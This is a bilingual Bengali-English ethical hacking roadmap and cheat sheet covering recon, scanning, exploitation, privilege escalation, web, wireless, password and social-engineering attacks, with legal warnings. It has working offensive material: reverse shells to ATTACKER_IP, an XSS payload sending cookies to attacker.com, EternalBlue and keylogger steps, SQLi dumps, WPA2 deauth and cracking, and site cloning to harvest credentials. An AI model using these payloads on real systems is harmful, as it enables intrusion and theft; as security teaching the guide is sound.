// COMPLETE ROADMAP v1.0 //

ETHICAL HACKING

& PENETRATION TESTING

সম্পূর্ণ বাংলা রোডম্যাপ ও গাইডComplete Roadmap & Guide

Reconnaissance থেকে Reporting পর্যন্ত — Ethical Hacking-এর A থেকে Z, বাংলায় সম্পূর্ণ রোডম্যাপ, চিট শিট, এবং হাতে-কলমে গাইড। From Reconnaissance to Reporting — A to Z of Ethical Hacking, with a complete roadmap, cheat sheets, and hands-on guide.

hacker@kali:~# whoami
ethical_hacker_in_trainingethical_hacker_in_training
hacker@kali:~# cat goal.txt
শিখো → বোঝো → ভাঙো → রক্ষা করোLearn → Understand → Break → Protect
hacker@kali:~# ./start_journey.sh
[+] রোডম্যাপ লোড হচ্ছে...Loading roadmap...
🕵️ Reconnaissance 🔍 Scanning 💥 Exploitation ⬆️ Privilege Escalation 🔒 Post-Exploitation 📝 Reporting 🌐 Web App Testing 📡 Network Hacking 🛠️ Tools & Frameworks 📋 Cheat Sheets
// বিষয়সূচিTABLE OF CONTENTS //
01
Ethical Hacking পরিচিতি ও রোডম্যাপIntro to Ethical Hacking & Roadmap
Hacking কী, Legal Framework, Career Path, MindsetWhat is Hacking, Legal Framework, Career Path, Mindset
FOUNDATION
02
Reconnaissance — তথ্য সংগ্রহReconnaissance — Information Gathering
Passive vs Active Recon, OSINT, Google Dorks, ShodanPassive vs Active Recon, OSINT, Google Dorks, Shodan
RECON
03
Scanning & EnumerationScanning & Enumeration
Nmap, Masscan, Nikto, Banner Grabbing, Service DetectionNmap, Masscan, Nikto, Banner Grabbing, Service Detection
SCAN
04
Vulnerability AssessmentVulnerability Assessment
CVE, CVSS, OpenVAS, Nessus, Manual AnalysisCVE, CVSS, OpenVAS, Nessus, Manual Analysis
VULN
05
Exploitation — দুর্বলতা কাজে লাগানোExploitation — Taking Advantage of Vulnerabilities
Metasploit, Manual Exploits, Buffer Overflow, CVE ExploitMetasploit, Manual Exploits, Buffer Overflow, CVE Exploit
EXPLOIT
06
Post-Exploitation & Privilege EscalationPost-Exploitation & Privilege Escalation
Persistence, Lateral Movement, Data ExfiltrationPersistence, Lateral Movement, Data Exfiltration
POST-EX
07
Web Application HackingWeb Application Hacking
OWASP Top 10, SQLi, XSS, SSRF, Burp Suite WorkflowOWASP Top 10, SQLi, XSS, SSRF, Burp Suite Workflow
WEB
08
Network Hacking & WirelessNetwork Hacking & Wireless
MITM, ARP Spoofing, WiFi Cracking, WPA2 AttackMITM, ARP Spoofing, WiFi Cracking, WPA2 Attack
NETWORK
09
Password Attacks & CrackingPassword Attacks & Cracking
Hashcat, John, Hydra, Rainbow Tables, WordlistsHashcat, John, Hydra, Rainbow Tables, Wordlists
CRACK
10
Social EngineeringSocial Engineering
Phishing, Vishing, Pretexting, SET FrameworkPhishing, Vishing, Pretexting, SET Framework
SOCIAL
11
Reporting & DocumentationReporting & Documentation
Pentest Report লেখা, CVSS Scoring, Executive SummaryWriting Pentest Reports, CVSS Scoring, Executive Summary
REPORT
12
Cheat Sheet — সম্পূর্ণ রেফারেন্সCheat Sheet — Complete Reference
Nmap, Metasploit, SQLi, XSS, Reverse Shell — সব কমান্ডNmap, Metasploit, SQLi, XSS, Reverse Shell — All Commands
CHEAT
CHAPTER 01
🎯 Ethical Hacking পরিচিতি ও সম্পূর্ণ রোডম্যাপIntro to Ethical Hacking & Complete Roadmap
Hacking কী, কেন শিখবে, Career Path এবং Ethical Hacker-এর MindsetWhat is Hacking, why learn it, Career Path, and Ethical Hacker Mindset

Ethical Hacking কী?What is Ethical Hacking?

Ethical Hacking হলো একজন authorized ব্যক্তির দ্বারা কোনো সিস্টেম, নেটওয়ার্ক বা অ্যাপ্লিকেশনের দুর্বলতা খুঁজে বের করার প্রক্রিয়া — যাতে সেগুলো সংশোধন করা যায়। এটাকে Penetration Testing বা White Hat Hacking-ও বলা হয়।Ethical Hacking is the process by which an authorized individual identifies vulnerabilities in a system, network, or application — so that they can be fixed. It is also called Penetration Testing or White Hat Hacking.

🟢 White Hat

অনুমতি নিয়ে সিস্টেম টেস্ট করে। Ethical Hacker। Legal।Tests systems with permission. Ethical Hacker. Legal.

🟡 Grey Hat

কখনো অনুমতি ছাড়া, কিন্তু ক্ষতির উদ্দেশ্য নেই। আইনগতভাবে ঝুঁকিপূর্ণ।Sometimes without permission, but no malicious intent. Legally risky.

🔴 Black Hat

অনুমতি ছাড়া সিস্টেম ভাঙে। Criminal। Illegal।Breaks into systems without permission. Criminal. Illegal.

Penetration Testing MethodologyPenetration Testing Methodology

🕵️
ReconnaissanceReconnaissance
🔍
ScanningScanning
🎯
Gaining AccessGaining Access
⬆️
Maintaining AccessMaintaining Access
🧹
Clearing TracksClearing Tracks
📝
ReportingReporting

সম্পূর্ণ Learning RoadmapComplete Learning Roadmap

1
🌱 ফাউন্ডেশন (১-৩ মাস)🌱 Foundation (1-3 Months)
শুরু করার আগে যা জানতে হবেWhat you need to know before starting
Linux Basics Networking (TCP/IP) Python Scripting Web Basics (HTTP) Virtualization (VMware/VBox)
2
🔍 Reconnaissance & Scanning (২-৩ মাস)🔍 Reconnaissance & Scanning (2-3 Months)
Target সম্পর্কে তথ্য সংগ্রহ করার কৌশলTechniques for gathering information about a target
Nmap OSINT (Maltego) Google Dorks Shodan theHarvester Nikto
3
💥 Exploitation (৩-৪ মাস)💥 Exploitation (3-4 Months)
দুর্বলতা খুঁজে কাজে লাগানোFinding and exploiting vulnerabilities
Metasploit Burp Suite SQLi / XSS Buffer Overflow CVE Research
4
⬆️ Post-Exploitation & PrivEsc (২-৩ মাস)⬆️ Post-Exploitation & PrivEsc (2-3 Months)
System-এ ঢোকার পর কী করতে হয়What to do after getting into a system
LinPEAS/WinPEAS Mimikatz BloodHound Persistence Pivoting
5
🏆 Certification & CTF (চলমান)🏆 Certification & CTF (Ongoing)
Career প্রমাণের জন্য সার্টিফিকেশনCertifications to prove your career skills
CEH OSCP eJPT TryHackMe HackTheBox Bug Bounty

Career Path — কোথায় যাবে?Career Path — Where Can You Go?

ভূমিকাRole কাজWork গড় বেতন (USD)Avg Salary (USD) দরকারি সার্টিফিকেটRequired Certs
Penetration Testerসিস্টেম ভেঙে রিপোর্ট করাBreak systems & report$80K–$130KOSCP, CEH
Bug Bounty Hunterকোম্পানির bug খুঁজে পুরস্কার নেওয়াFind bugs, get rewards$20K–$200K+কোনোটাই না
Red Team OperatorReal attacker simulate করাSimulate real attackers$100K–$160KOSCP, CRTO
Security Researcherনতুন vulnerability গবেষণাResearch new vulnerabilities$90K–$150KCVE Publication
SOC Analystআক্রমণ detect ও respond করাDetect & respond to attacks$55K–$90KCompTIA Security+
⚖️ আইনগত সতর্কতাLegal Warning

সবসময় written permission নিয়ে কাজ করো। বাংলাদেশে Digital Security Act এবং আন্তর্জাতিকভাবে Computer Fraud and Abuse Act (CFAA) অনুযায়ী অননুমোদিত হ্যাকিং ফৌজদারি অপরাধ। HackTheBox, TryHackMe বা নিজের lab-এ practice করো।Always work with written permission. Unauthorized hacking is a criminal offense under Bangladesh's Digital Security Act and internationally under the Computer Fraud and Abuse Act (CFAA). Practice on HackTheBox, TryHackMe, or your own lab.

// মূল কথাKey Takeaways //

  • 🟢 Ethical Hacking = অনুমতি + দক্ষতা + দায়িত্বEthical Hacking = Permission + Skill + Responsibility
  • 🔵 Foundation ছাড়া hacking শেখা সম্ভব না — Linux, Networking, Python আগে শেখোCannot learn hacking without a foundation — learn Linux, Networking, Python first
  • 🔴 সবসময় legal environment-এ practice করোAlways practice in a legal environment
  • 🟡 Roadmap অনুসরণ করো — shortcuts নেইFollow the roadmap — there are no shortcuts
CHAPTER 02
🕵️ Reconnaissance — তথ্য সংগ্রহReconnaissance — Information Gathering
Target সম্পর্কে সর্বোচ্চ তথ্য সংগ্রহ করাই প্রথম এবং সবচেয়ে গুরুত্বপূর্ণ ধাপGathering maximum information about the target is the first and most important step

Passive vs Active ReconnaissancePassive vs Active Reconnaissance

🔇 Passive ReconPassive Recon

Target-এর সাথে সরাসরি যোগাযোগ ছাড়া তথ্য সংগ্রহ। সম্পূর্ণ stealth — target টের পায় না।Gathering information without direct contact with the target. Completely stealth — target won't notice.

  • WHOIS lookup
  • Google Dorks
  • LinkedIn/Social Media
  • Shodan / Censys
  • DNS Records
  • Job Postings (tech stack)

📡 Active ReconActive Recon

সরাসরি target-এর সাথে interact করে তথ্য সংগ্রহ। Log-এ trace থাকতে পারে।Information gathering by directly interacting with the target. May leave traces in logs.

  • Nmap port scanning
  • Banner grabbing
  • Ping sweep
  • DNS zone transfer
  • Web crawling
  • Traceroute

OSINT — Open Source IntelligenceOSINT — Open Source Intelligence

OSINT হলো publicly available তথ্য ব্যবহার করে target সম্পর্কে intelligence তৈরি করা। Professional pentester-রা ৬০-৭০% সময় recon-এ ব্যয় করে।OSINT is using publicly available information to create intelligence about a target. Professional pentesters spend 60-70% of their time on recon.

Google Dorks — সার্চ ইঞ্জিন হ্যাকিংGoogle Dorks — Search Engine Hacking

# Google Dork Examples site:target.com filetype:pdf site:target.com inurl:admin site:target.com intitle:"index of" inurl:target.com ext:sql | ext:db | ext:log "@target.com" filetype:xls site:target.com intext:"password" OR intext:"passwd" intitle:"Apache Status" inurl:server-status site:target.com cache:target.com # Subdomain enumeration via Google site:*.target.com -www

WHOIS ও DNS EnumerationWHOIS & DNS Enumeration

# WHOIS lookup $ whois target.com $ whois 192.168.1.1 # DNS Enumeration $ nslookup target.com $ dig target.com ANY $ dig target.com MX $ dig target.com NS $ host -t ns target.com # DNS Zone Transfer (misconfiguration exploit) $ dig axfr @ns1.target.com target.com $ dnsrecon -d target.com -t axfr # Subdomain Enumeration $ sublist3r -d target.com $ amass enum -d target.com $ dnsx -d target.com -w /usr/share/wordlists/dns.txt

Shodan — Internet-এর Search EngineShodan — Search Engine of the Internet

# Shodan CLI $ shodan init YOUR_API_KEY $ shodan host 192.168.1.1 $ shodan search "apache 2.4" country:BD $ shodan search "port:22" org:"target company" # Shodan Dorks (web interface) hostname:target.com org:"Target Organization" net:192.168.0.0/24 port:3306 country:BD # MySQL servers "default password" port:80 vuln:CVE-2021-44228 # Log4Shell vulnerable

Email HarvestingEmail Harvesting

$ theHarvester -d target.com -b google,bing,linkedin $ theHarvester -d target.com -b all -l 500 -f output.html $ hunter.io # Web-based email finder $ emailhippo # Email validation

// Recon চেকলিস্টRecon Checklist //

  • WHOIS ও DNS records সংগ্রহ করোGather WHOIS and DNS records
  • Subdomain enumerate করোEnumerate subdomains
  • Email address ও কর্মীদের তালিকা তৈরি করোBuild a list of email addresses and employees
  • Shodan দিয়ে exposed service খোঁজোFind exposed services using Shodan
  • Google Dorks দিয়ে sensitive file খোঁজোFind sensitive files using Google Dorks
  • Social media থেকে tech stack বের করোExtract tech stack from social media
CHAPTER 03
🔍 Scanning & EnumerationScanning & Enumeration
Open port, running service, OS version — সব কিছু detect করার কৌশলDetecting open ports, running services, OS version — techniques for everything

Nmap — সবচেয়ে গুরুত্বপূর্ণ Scanning ToolNmap — The Most Important Scanning Tool

# Basic Scans $ nmap 192.168.1.1 # Basic scan $ nmap 192.168.1.0/24 # Network range $ nmap -p 80,443,22,21 192.168.1.1 # Specific ports $ nmap -p- 192.168.1.1 # All 65535 ports $ nmap -p 1-1000 192.168.1.1 # Port range # Scan Types $ nmap -sS 192.168.1.1 # SYN (Stealth) scan $ nmap -sT 192.168.1.1 # TCP Connect scan $ nmap -sU 192.168.1.1 # UDP scan $ nmap -sA 192.168.1.1 # ACK scan (firewall detection) # Service & OS Detection $ nmap -sV 192.168.1.1 # Service version $ nmap -O 192.168.1.1 # OS detection $ nmap -A 192.168.1.1 # Aggressive (OS+Version+Scripts) $ nmap -sV --version-intensity 9 # Max version detection # NSE Scripts $ nmap --script vuln 192.168.1.1 # Vulnerability scan $ nmap --script smb-vuln-* 192.168.1.1 # SMB vulnerabilities $ nmap --script http-enum 192.168.1.1 # Web enumeration $ nmap --script ftp-anon 192.168.1.1 # Anonymous FTP $ nmap --script ssh-brute 192.168.1.1 # SSH brute force # Evasion Techniques $ nmap -D RND:10 192.168.1.1 # Decoy scan $ nmap -f 192.168.1.1 # Fragment packets $ nmap --source-port 53 # Spoof source port $ nmap -T0 192.168.1.1 # Paranoid (very slow) # Output Formats $ nmap -oN output.txt # Normal text $ nmap -oX output.xml # XML format $ nmap -oG output.gnmap # Grepable $ nmap -oA output # All formats

Service-Specific EnumerationService-Specific Enumeration

SMB Enumeration (Port 445)

$ enum4linux -a 192.168.1.1 $ smbclient -L //192.168.1.1 -N $ smbmap -H 192.168.1.1 $ crackmapexec smb 192.168.1.1 $ nmap --script smb-enum-users 192.168.1.1

Web Enumeration (Port 80/443)

# Directory Bruteforce $ gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt $ ffuf -w wordlist.txt -u http://target.com/FUZZ $ dirb http://target.com # Web Scanner $ nikto -h http://target.com $ whatweb http://target.com $ wafw00f http://target.com # WAF detection

FTP / SSH / SNMP Enumeration

# FTP (Port 21) — Anonymous Login Check $ nmap --script ftp-anon,ftp-bounce -p 21 192.168.1.1 # SSH (Port 22) $ ssh-audit 192.168.1.1 # Algorithm & version check # SNMP (Port 161) — Community string $ snmpwalk -c public -v1 192.168.1.1 $ onesixtyone -c community.txt 192.168.1.1
গুরুত্বপূর্ণ Port নম্বরImportant Port Numbers
21 → FTP    22 → SSH    23 → Telnet
25 → SMTP   53 → DNS    80 → HTTP
110 → POP3   143 → IMAP   443 → HTTPS
445 → SMB    3306 → MySQL   3389 → RDP
5432 → PostgreSQL   6379 → Redis
8080 → HTTP-Alt   27017 → MongoDB
CHAPTER 04
🎯 Vulnerability AssessmentVulnerability Assessment
CVE, CVSS Score, Automated ও Manual vulnerability analysisCVE, CVSS Score, Automated and Manual vulnerability analysis

CVE ও CVSS Score বোঝাUnderstanding CVE & CVSS Score

CVE (Common Vulnerabilities and Exposures) হলো publicly disclosed vulnerability-র unique identifier। প্রতিটা CVE-র একটা CVSS Score থাকে যা ০ থেকে ১০-এর মধ্যে।CVE (Common Vulnerabilities and Exposures) is a unique identifier for publicly disclosed vulnerabilities. Each CVE has a CVSS Score between 0 and 10.

CVSS Score গুরুত্বSeverity অর্থMeaning
9.0 – 10.0CRITICALতাৎক্ষণিক প্যাচ দরকারImmediate patch required
7.0 – 8.9HIGHশীঘ্রই ঠিক করতে হবেFix soon
4.0 – 6.9MEDIUMপরিকল্পনা করে ঠিক করোFix with planning
0.1 – 3.9LOWকম গুরুত্বপূর্ণLess urgent

Automated Vulnerability ScannersAutomated Vulnerability Scanners

# OpenVAS (Free) $ sudo gvm-start # Web UI: https://localhost:9392 # Nessus Essentials (Free for 16 IPs) # Web UI: https://localhost:8834 # Nuclei (Fast, template-based) $ nuclei -u https://target.com $ nuclei -u https://target.com -t cves/ $ nuclei -l urls.txt -t vulnerabilities/ $ nuclei -u target.com -severity critical,high # searchsploit — Exploit Database $ searchsploit apache 2.4 $ searchsploit -m 44228 # Copy exploit to current dir $ searchsploit --cve 2021-44228

Manual Vulnerability ResearchManual Vulnerability Research

🔍 তথ্যের উৎসInformation Sources

  • NVD — nvd.nist.gov
  • Exploit-DB — exploit-db.com
  • CVE Details — cvedetails.com
  • Packet Storm — packetstormsecurity.com
  • GitHub — PoC exploits
  • VulnHub — Vulnerable VMs

Manual Analysis StepsManual Analysis Steps

  • Service ও version note করোNote service and version
  • searchsploit দিয়ে exploit খোঁজোSearch exploits with searchsploit
  • CVE database দেখোCheck the CVE database
  • Exploit পড়ো ও বোঝোRead and understand the exploit
  • Lab-এ test করো আগেTest in lab first
  • Scope বাইরে যেও নাDon't go out of scope
CHAPTER 05
💥 Exploitation — দুর্বলতা কাজে লাগানোExploitation — Taking Advantage of Vulnerabilities
Metasploit Framework, Manual Exploit এবং Reverse ShellMetasploit Framework, Manual Exploit, and Reverse Shell

Metasploit FrameworkMetasploit Framework

# Start Metasploit $ msfconsole msf6 > help # Search & Use Module msf6 > search eternalblue msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > info msf6 > show options msf6 > set RHOSTS 192.168.1.1 msf6 > set LHOST 192.168.1.100 msf6 > set LPORT 4444 msf6 > set payload windows/x64/meterpreter/reverse_tcp msf6 > run # Meterpreter Commands meterpreter > sysinfo meterpreter > getuid meterpreter > getsystem # Privilege Escalation meterpreter > hashdump # Password hashes meterpreter > shell meterpreter > upload /path/to/file C:\\Windows\\Temp\\ meterpreter > download C:\\file.txt /local/path/ meterpreter > screenshot meterpreter > keyscan_start # Keylogger meterpreter > run post/multi/recon/local_exploit_suggester

Reverse ShellReverse Shell

# Listener setup (attacker machine) $ nc -lvnp 4444 $ rlwrap nc -lvnp 4444 # With readline support # Bash Reverse Shell bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 # Python Reverse Shell python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' # PHP Reverse Shell php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");' # PowerShell Reverse Shell (Windows) powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);..." # Netcat Reverse Shell nc -e /bin/sh ATTACKER_IP 4444 # Upgrade to fully interactive shell python3 -c 'import pty;pty.spawn("/bin/bash")' Ctrl+Z stty raw -echo; fg export TERM=xterm

Common Exploit TypesCommon Exploit Types

🔴 বিখ্যাত CVE ExploitsFamous CVE Exploits

  • EternalBlue (MS17-010) — SMB
  • Log4Shell (CVE-2021-44228)
  • PrintNightmare (CVE-2021-34527)
  • Shellshock (CVE-2014-6271) — Bash
  • Heartbleed (CVE-2014-0160) — OpenSSL
  • BlueKeep (CVE-2019-0708) — RDP

🟣 Payload TypesPayload Types

  • Singlesস্বাবলম্বী, কোনো stage নেইSelf-contained, no stage
  • Stagersছোট, stage download করেSmall, downloads stage
  • StagesStager দ্বারা লোড হয়Loaded by stager
  • MeterpreterAdvanced, in-memoryAdvanced, in-memory
  • ShellSimple command shellSimple command shell
CHAPTER 06
⬆️ Post-Exploitation & Privilege EscalationPost-Exploitation & Privilege Escalation
System-এ ঢোকার পর Persistence, PrivEsc, Lateral Movement, Data ExfiltrationAfter getting in — Persistence, PrivEsc, Lateral Movement, Data Exfiltration

Privilege Escalation — LinuxPrivilege Escalation — Linux

# Automated Enumeration $ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh $ wget -O linpeas.sh https://linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh # Manual Checks $ id && whoami $ sudo -l # Sudo permissions $ find / -perm -u=s -type f 2>/dev/null # SUID files $ cat /etc/crontab # Cron jobs $ cat /etc/passwd | grep -v nologin $ ss -tulpn # Listening ports $ ps aux # Running processes $ find / -writable -type d 2>/dev/null # Writable dirs $ uname -a # Kernel version # GTFOBins — SUID exploit reference # https://gtfobins.github.io $ sudo find . -exec /bin/sh \; -quit # find SUID $ sudo vim -c ':!/bin/sh' # vim sudo

Privilege Escalation — WindowsPrivilege Escalation — Windows

# WinPEAS C:\> winpeas.exe # Manual Checks C:\> whoami /priv C:\> net user C:\> net localgroup administrators C:\> systeminfo C:\> sc query type= all state= all C:\> wmic service get name,startname PS > Get-HotFix | sort InstalledOn # Missing patches # Token Impersonation (Meterpreter) meterpreter > use incognito meterpreter > list_tokens -u meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"

Persistence TechniquesPersistence Techniques

🐧 Linux PersistenceLinux Persistence

  • Cron job যোগ করাAdd a cron job
  • SSH key inject করাInject SSH key
  • .bashrc backdoor.bashrc backdoor
  • Systemd service তৈরি করাCreate a systemd service
  • SUID binary তৈরি করাCreate SUID binary

🪟 Windows PersistenceWindows Persistence

  • Registry Run keyRegistry Run key
  • Scheduled TaskScheduled Task
  • Startup folderStartup folder
  • Service install করাInstall a service
  • DLL HijackingDLL Hijacking
CHAPTER 07
🌐 Web Application HackingWeb Application Hacking
OWASP Top 10, SQLi, XSS, CSRF, SSRF, File Upload, Burp Suite WorkflowOWASP Top 10, SQLi, XSS, CSRF, SSRF, File Upload, Burp Suite Workflow

OWASP Top 10 (2021)OWASP Top 10 (2021)

# দুর্বলতাVulnerability সংক্ষেপSummary
A01Broken Access Controlঅননুমোদিত resource accessUnauthorized resource access
A02Cryptographic FailuresWeak encryption, HTTP, plain-text passwordWeak encryption, HTTP, plain-text password
A03InjectionSQLi, XSS, Command InjectionSQLi, XSS, Command Injection
A04Insecure DesignBusiness logic flawBusiness logic flaw
A05Security MisconfigurationDefault password, verbose errorDefault password, verbose error
A06Vulnerable ComponentsOutdated library/frameworkOutdated library/framework
A07Auth FailuresWeak password, broken sessionWeak password, broken session
A08Software Integrity FailuresCI/CD pipeline attackCI/CD pipeline attack
A09Logging Failuresঅপর্যাপ্ত logging ও monitoringInsufficient logging & monitoring
A10SSRFServer-side request forgeryServer-side request forgery

SQL InjectionSQL Injection

# Basic SQLi Test ' OR '1'='1 ' OR '1'='1'-- ' OR 1=1-- " OR "1"="1 admin'-- ') OR ('1'='1 # UNION-based SQLi ' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- ' UNION SELECT NULL,NULL,NULL-- ' UNION SELECT username,password FROM users-- # Error-based SQLi ' AND extractvalue(1,concat(0x7e,version()))-- ' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- # Blind SQLi (Boolean-based) ' AND 1=1-- # True → page loads normally ' AND 1=2-- # False → page changes ' AND SUBSTRING(username,1,1)='a'-- # SQLMap — Automated SQLi $ sqlmap -u "http://target.com/page.php?id=1" $ sqlmap -u "http://target.com/page.php?id=1" --dbs $ sqlmap -u "http://target.com/page.php?id=1" -D mydb --tables $ sqlmap -u "http://target.com/page.php?id=1" -D mydb -T users --dump $ sqlmap -r request.txt --level 5 --risk 3

Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)

# Basic XSS Payloads <script>alert('XSS')</script> <script>alert(document.cookie)</script> <img src=x onerror=alert('XSS')> <svg onload=alert('XSS')> '"><script>alert(1)</script> # Cookie Stealing <script>document.location='http://attacker.com/steal?c='+document.cookie</script> # WAF Bypass <ScRiPt>alert(1)</ScRiPt> <script>eval(atob('YWxlcnQoMSk='))</script> <img src="x" onerror="alert(1)">

Burp Suite WorkflowBurp Suite Workflow

🔧 মূল FeaturesCore Features

  • ProxyHTTP request interceptHTTP request intercept
  • RepeaterManual request modifyManual request modify
  • IntruderAutomated fuzzingAutomated fuzzing
  • ScannerAuto vulnerability scanAuto vulnerability scan
  • DecoderEncode/decode dataEncode/decode data
  • ComparerResponse comparisonResponse comparison

🎯 Testing WorkflowTesting Workflow

  1. Proxy ব্রাউজারে set করোSet proxy in browser
  2. Target browse করো, requests দেখোBrowse target, view requests
  3. Interesting request Repeater-এ পাঠাওSend interesting requests to Repeater
  4. Parameter modify করে test করোModify parameters and test
  5. Intruder দিয়ে fuzz করোFuzz with Intruder
  6. Scanner দিয়ে auto scan করোRun auto scan with Scanner
CHAPTER 08
📡 Network Hacking & WirelessNetwork Hacking & Wireless
MITM Attack, ARP Spoofing, WiFi Password Cracking, WPA2 AttackMITM Attack, ARP Spoofing, WiFi Password Cracking, WPA2 Attack

Man-in-the-Middle (MITM) AttackMan-in-the-Middle (MITM) Attack

# ARP Spoofing $ arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP $ arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP # Enable IP Forwarding $ echo 1 > /proc/sys/net/ipv4/ip_forward # Bettercap — All-in-one MITM $ bettercap -iface eth0 » net.probe on » net.recon on » arp.spoof.targets VICTIM_IP » arp.spoof on » net.sniff on » https.proxy on # SSL Strip

WiFi Hacking — WPA/WPA2WiFi Hacking — WPA/WPA2

⚠️ শুধুমাত্র নিজের নেটওয়ার্কে বা অনুমতি নিয়ে!Only on your own network or with permission!
# Monitor Mode $ airmon-ng check kill $ airmon-ng start wlan0 # Now interface is wlan0mon # Scan Networks $ airodump-ng wlan0mon # Capture Handshake $ airodump-ng --bssid TARGET_MAC -c CHANNEL -w capture wlan0mon # Deauth Attack (force reconnect) $ aireplay-ng -0 5 -a TARGET_MAC -c CLIENT_MAC wlan0mon # Crack WPA2 Handshake $ aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt $ hashcat -m 22000 capture.hc22000 rockyou.txt # WPS Attack (Pixie Dust) $ wash -i wlan0mon # Find WPS-enabled APs $ reaver -i wlan0mon -b TARGET_MAC -vv

Packet SniffingPacket Sniffing

# Tcpdump $ tcpdump -i eth0 $ tcpdump -i eth0 -w capture.pcap $ tcpdump -r capture.pcap $ tcpdump host 192.168.1.1 $ tcpdump port 80 $ tcpdump -A port 80 # ASCII output (HTTP) # Tshark (Wireshark CLI) $ tshark -i eth0 $ tshark -r capture.pcap -Y "http.request" $ tshark -r capture.pcap -Y "ftp" -T fields -e ftp.request.arg
CHAPTER 09
🔑 Password Attacks & CrackingPassword Attacks & Cracking
Hash cracking, Brute Force, Dictionary Attack, Rainbow TablesHash cracking, Brute Force, Dictionary Attack, Rainbow Tables

Hash Identification ও CrackingHash Identification & Cracking

# Identify Hash Type $ hash-identifier $ hashid "5f4dcc3b5aa765d61d8327deb882cf99" $ name-that-hash -t "hash_value" # Hashcat — GPU-powered cracking $ hashcat -m 0 hash.txt rockyou.txt # MD5 $ hashcat -m 100 hash.txt rockyou.txt # SHA1 $ hashcat -m 1000 hash.txt rockyou.txt # NTLM $ hashcat -m 1800 hash.txt rockyou.txt # SHA-512crypt $ hashcat -m 22000 wpa.hc22000 rockyou.txt # WPA2 $ hashcat -m 0 hash.txt -a 3 ?l?l?l?l?l?l # Brute Force $ hashcat -m 0 hash.txt -r rules/best64.rule rockyou.txt # John the Ripper $ john hash.txt $ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt $ john hash.txt --format=md5crypt $ john --show hash.txt # Show cracked passwords $ unshadow /etc/passwd /etc/shadow > combined.txt && john combined.txt

Online Service Brute ForceOnline Service Brute Force

# Hydra — Network Login Cracker $ hydra -l admin -P rockyou.txt ssh://192.168.1.1 $ hydra -L users.txt -P rockyou.txt ftp://192.168.1.1 $ hydra -l admin -P rockyou.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect" $ hydra -l admin -P rockyou.txt rdp://192.168.1.1 $ hydra -l admin -P rockyou.txt smtp://mail.target.com # Medusa $ medusa -h 192.168.1.1 -u admin -P rockyou.txt -M ssh # CrackMapExec — SMB Password Spray $ crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt $ crackmapexec smb 192.168.1.1 -u admin -p 'Password123!'

WordlistsWordlists

WordlistWordlist আকারSize ব্যবহারUse
rockyou.txt14M passwordsসবচেয়ে বেশি ব্যবহৃতMost commonly used
SecListsবিশাল collectionHuge collectionDirectory, username, passwordDirectory, username, password
kaonashi.txt500M+Powerful crackPowerful crack
hashkillerOnlinePre-computed hashesPre-computed hashes
CHAPTER 10
🎭 Social EngineeringSocial Engineering
Human psychology ব্যবহার করে তথ্য বা access বের করার কৌশলUsing human psychology to extract information or access

Social Engineering কী?What is Social Engineering?

Social Engineering হলো মানুষের মনোবিজ্ঞান ও বিশ্বাসযোগ্যতাকে কাজে লাগিয়ে sensitive তথ্য বা unauthorized access বের করা। প্রযুক্তিগত দুর্বলতার চেয়ে মানবিক দুর্বলতা exploit করা অনেক সহজ।Social Engineering is exploiting human psychology and trust to extract sensitive information or gain unauthorized access. Exploiting human vulnerabilities is often easier than technical ones.

📧 PhishingPhishing

নকল email পাঠিয়ে ব্যবহারকারীকে ক্ষতিকর link-এ click করানো বা credential চুরি করা।Sending fake emails to trick users into clicking harmful links or stealing credentials.

📞 VishingVishing

ফোন কলের মাধ্যমে নিজেকে IT support বা ব্যাংক হিসেবে পরিচয় দিয়ে তথ্য বের করা।Using phone calls, pretending to be IT support or a bank, to extract information.

💬 PretextingPretexting

মিথ্যা পরিচয় ও পরিস্থিতি তৈরি করে target-এর বিশ্বাস অর্জন করা।Creating a false identity and scenario to gain the target's trust.

🪤 BaitingBaiting

USB drive ফেলে রাখা বা free software-এর লোভ দেখিয়ে malware ইনস্টল করানো।Leaving a USB drive or luring with free software to get malware installed.

Social Engineering Toolkit (SET)Social Engineering Toolkit (SET)

# Launch SET $ setoolkit # Spear-Phishing Attack Vectors 1) Social-Engineering Attacks → 1) Spear-Phishing Attack Vectors → 1) Perform a Mass Email Attack # Website Clone (Credential Harvesting) 1) Social-Engineering Attacks → 2) Website Attack Vectors → 3) Credential Harvester Attack Method → 2) Site Cloner → Enter URL to clone: http://facebook.com # GoPhish — Professional Phishing Framework $ ./gophish # Web UI: https://localhost:3333
🛡️ Social Engineering থেকে রক্ষার উপায়How to Protect Against Social Engineering
  • অচেনা email-এর link-এ click করো নাDon't click links in unknown emails
  • ফোনে কখনো password বলো নাNever give your password over the phone
  • MFA সবসময় চালু রাখোAlways enable MFA
  • Security awareness training নাওTake security awareness training
  • Verify করো, বিশ্বাস করো নাVerify, don't just trust
CHAPTER 11
📝 Reporting & DocumentationReporting & Documentation
Professional Penetration Testing Report লেখার সম্পূর্ণ গাইডComplete guide to writing a professional Penetration Testing Report

Pentest Report StructurePentest Report Structure

📋 রিপোর্টের অংশReport Sections

  1. Executive Summary
  2. Scope & Methodology
  3. Findings Summary
  4. Detailed Findings
  5. Risk Rating
  6. Recommendations
  7. Appendix

প্রতিটি Finding-এ যা থাকবেWhat Each Finding Includes

  • Vulnerability নাম ও CVEVulnerability name & CVE
